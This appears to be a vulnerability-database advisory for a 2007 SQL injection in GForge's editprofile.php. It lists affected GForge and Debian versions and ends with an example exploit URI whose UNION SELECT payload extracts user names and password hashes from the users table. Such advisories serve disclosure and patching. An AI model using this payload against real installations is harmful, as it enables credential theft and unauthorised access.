exploits , vulnerabilities , articles , GForge Topic EditProfile.PHP SQL Injection Vulnerability

Title	GForge Topic EditProfile.PHP SQL Injection Vulnerability
Published	2007-09-14-12:00AM
Updated	2007-09-14-06:20PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Summit Siddharth of Portcullis Computer Security is credited with the discovery of this vulnerability.
Vulnerable	GForge GForge 4.5.14 Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia64 Debian Linux 4.0 ia32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0 GForge GForge 4.5.11 GForge GForge 4.5 GForge GForge 4.0.2 GForge GForge 4.0.1 GForge GForge 4.0 GForge GForge 3.21 GForge GForge 3.3 GForge GForge 3.2 GForge GForge 3.1 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia64 Debian Linux 3.1 ia32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha Debian Linux 3.1
Not Vulnerable
Code	Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/www/people/editprofile.php?skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name\|\|unix_pw+from+users--%3d1&MultiDelete=Delete
TXT